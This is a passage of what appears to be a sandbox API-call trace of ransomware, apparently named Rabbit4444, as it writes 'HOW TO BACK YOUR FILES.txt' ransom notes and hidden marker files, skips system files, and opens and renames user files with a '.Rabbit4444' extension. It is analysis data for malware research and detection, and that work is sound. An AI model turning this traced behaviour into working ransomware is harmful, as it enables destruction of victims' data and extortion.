ftLastAccessTime.dwLowDateTime=0xefeb5d90, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xefeb5d90, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="speech_onecorereg.bin.LOG2", cAlternateFileName="SPEECH~2.LOG")) returned 0 [0067.161] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0067.161] lstrcpyW (in: lpString1=0x130ebec, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0067.161] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0067.163] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0067.163] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0067.164] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.164] CloseHandle (hObject=0x27c) returned 1 [0067.164] CloseHandle (hObject=0x228) returned 1 [0067.164] GetCurrentThreadId () returned 0xd98 [0067.164] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222a8 [0067.164] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\Flighting", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\Flighting") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\Flighting" [0067.164] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116520 | out: hHeap=0xe0000) returned 1 [0067.164] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222a0 | out: hHeap=0xe0000) returned 1 [0067.164] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\Flighting" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\Flighting") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\Flighting" [0067.164] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\Flighting", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\Flighting\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\Flighting\\" [0067.164] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\Flighting\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\Flighting\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\Flighting\\.BFC0E91B00AE8A0620D3" [0067.164] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\Flighting\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\flighting\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0067.169] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0067.171] FlushFileBuffers (hFile=0x228) returned 1 [0067.172] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\Flighting\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0067.173] CloseHandle (hObject=0x228) returned 1 [0067.173] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\Flighting") returned 99 [0067.173] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0067.173] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\Flighting\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1edc172b, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x1edc172b, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0xf15a4a03, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0067.173] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.173] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0067.173] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0067.173] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.173] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1edc172b, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x1edc172b, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0xf15a4a03, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.173] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.174] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0067.174] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0067.174] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.174] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.174] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf15a4a03, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf15a4a03, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf15ca959, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0067.174] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.174] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0067.174] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf15a4a03, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf15a4a03, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf15ca959, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0067.174] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0067.174] lstrcpyW (in: lpString1=0x130ec00, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0067.174] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\Flighting\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\flighting\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0067.174] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0067.175] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0067.175] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.175] CloseHandle (hObject=0x27c) returned 1 [0067.175] CloseHandle (hObject=0x228) returned 1 [0067.175] GetCurrentThreadId () returned 0xd98 [0067.175] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222c8 [0067.175] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache" [0067.175] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11c308 | out: hHeap=0xe0000) returned 1 [0067.175] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222c0 | out: hHeap=0xe0000) returned 1 [0067.175] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache" [0067.175] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\" [0067.175] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\.BFC0E91B00AE8A0620D3" [0067.175] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\devicesearchcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0067.177] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0067.180] FlushFileBuffers (hFile=0x228) returned 1 [0067.181] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0067.181] CloseHandle (hObject=0x228) returned 1 [0067.181] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache") returned 107 [0067.181] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0067.181] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc42f8885, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x520331de, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0xf15ca959, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0067.181] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.182] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0067.182] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0067.182] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.182] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc42f8885, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x520331de, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0xf15ca959, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.182] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.182] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0067.182] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0067.182] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.182] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.182] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf15ca959, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf15ca959, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf15ca959, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0067.182] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.182] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0067.182] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19669e8a, ftCreationTime.dwHighDateTime=0x1d336d8, ftLastAccessTime.dwLowDateTime=0x199649f9, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0x199649f9, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x20e85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppCache131509115860744759.txt", cAlternateFileName="APPCAC~1.TXT")) returned 1 [0067.182] lstrcmpiW (lpString1="AppCache131509115860744759.txt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.182] lstrcmpiW (lpString1="AppCache131509115860744759.txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.182] lstrcmpiW (lpString1="AppCache131509115860744759.txt", lpString2="Rabbit4444.exe") returned -1 [0067.182] lstrcmpiW (lpString1="AppCache131509115860744759.txt", lpString2=".") returned 1 [0067.182] lstrcmpiW (lpString1="AppCache131509115860744759.txt", lpString2="..") returned 1 [0067.182] lstrcmpiW (lpString1="AppCache131509115860744759.txt", lpString2="windows") returned -1 [0067.182] lstrcmpiW (lpString1="AppCache131509115860744759.txt", lpString2="bootmgr") returned -1 [0067.182] lstrcmpiW (lpString1="AppCache131509115860744759.txt", lpString2="pagefile.sys") returned -1 [0067.182] lstrcmpiW (lpString1="AppCache131509115860744759.txt", lpString2="boot") returned -1 [0067.182] lstrcmpiW (lpString1="AppCache131509115860744759.txt", lpString2="ids.txt") returned -1 [0067.182] lstrcmpiW (lpString1="AppCache131509115860744759.txt", lpString2="NTUSER.DAT") returned -1 [0067.182] lstrcpyW (in: lpString1=0x130ec10, lpString2="AppCache131509115860744759.txt" | out: lpString1="AppCache131509115860744759.txt") returned="AppCache131509115860744759.txt" [0067.182] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\AppCache131509115860744759.txt", dwFileAttributes=0x0) returned 1 [0067.183] lstrlenW (lpString="AppCache131509115860744759.txt") returned 30 [0067.183] lstrlenW (lpString="Rabbit4444") returned 10 [0067.183] lstrcmpiW (lpString1="744759.txt", lpString2="Rabbit4444") returned -1 [0067.183] lstrlenW (lpString=".dll") returned 4 [0067.183] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0067.183] lstrlenW (lpString=".lnk") returned 4 [0067.183] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0067.183] lstrlenW (lpString=".ini") returned 4 [0067.183] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0067.183] lstrlenW (lpString=".sys") returned 4 [0067.183] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0067.183] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\AppCache131509115860744759.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\devicesearchcache\\appcache131509115860744759.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0067.183] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.183] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15849415193) returned 1 [0067.183] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=134789) returned 1 [0067.184] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0067.184] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0067.184] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x21190, lpName=0x0) returned 0x260 [0067.185] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x21190) returned 0x70000 [0067.190] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.190] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0067.190] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.190] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0067.190] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.190] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0067.190] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.190] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0067.190] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15850095195) returned 1 [0067.190] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0067.190] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0067.190] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.192] CloseHandle (hObject=0x260) returned 1 [0067.192] CloseHandle (hObject=0x27c) returned 1 [0067.192] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\AppCache131509115860744759.txt.Rabbit4444") returned 149 [0067.192] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\AppCache131509115860744759.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\devicesearchcache\\appcache131509115860744759.txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\AppCache131509115860744759.txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\devicesearchcache\\appcache131509115860744759.txt.rabbit4444"), dwFlags=0x1) returned 1 [0067.193] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58188604, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x771b8f20, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x771b8f20, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x538f2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SettingsCache.txt", cAlternateFileName="SETTIN~1.TXT")) returned 1 [0067.193] lstrcmpiW (lpString1="SettingsCache.txt", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0067.193] lstrcmpiW (lpString1="SettingsCache.txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.193] lstrcmpiW (lpString1="SettingsCache.txt", lpString2="Rabbit4444.exe") returned 1 [0067.193] lstrcmpiW (lpString1="SettingsCache.txt", lpString2=".") returned 1 [0067.193] lstrcmpiW (lpString1="SettingsCache.txt", lpString2="..") returned 1 [0067.193] lstrcmpiW (lpString1="SettingsCache.txt", lpString2="windows") returned -1 [0067.193] lstrcmpiW (lpString1="SettingsCache.txt", lpString2="bootmgr") returned 1 [0067.193] lstrcmpiW (lpString1="SettingsCache.txt", lpString2="pagefile.sys") returned 1 [0067.193] lstrcmpiW (lpString1="SettingsCache.txt", lpString2="boot") returned 1 [0067.193] lstrcmpiW (lpString1="SettingsCache.txt", lpString2="ids.txt") returned 1 [0067.193] lstrcmpiW (lpString1="SettingsCache.txt", lpString2="NTUSER.DAT") returned 1 [0067.193] lstrcpyW (in: lpString1=0x130ec10, lpString2="SettingsCache.txt" | out: lpString1="SettingsCache.txt") returned="SettingsCache.txt" [0067.193] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\SettingsCache.txt", dwFileAttributes=0x0) returned 1 [0067.194] lstrlenW (lpString="SettingsCache.txt") returned 17 [0067.194] lstrlenW (lpString="Rabbit4444") returned 10 [0067.194] lstrcmpiW (lpString1="sCache.txt", lpString2="Rabbit4444") returned 1 [0067.194] lstrlenW (lpString=".dll") returned 4 [0067.194] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0067.194] lstrlenW (lpString=".lnk") returned 4 [0067.194] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0067.194] lstrlenW (lpString=".ini") returned 4 [0067.194] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0067.194] lstrlenW (lpString=".sys") returned 4 [0067.194] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0067.194] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\SettingsCache.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\devicesearchcache\\settingscache.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0067.194] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.194] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15850525416) returned 1 [0067.195] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=342258) returned 1 [0067.195] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0067.195] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0067.195] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x53c00, lpName=0x0) returned 0x260 [0067.196] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, 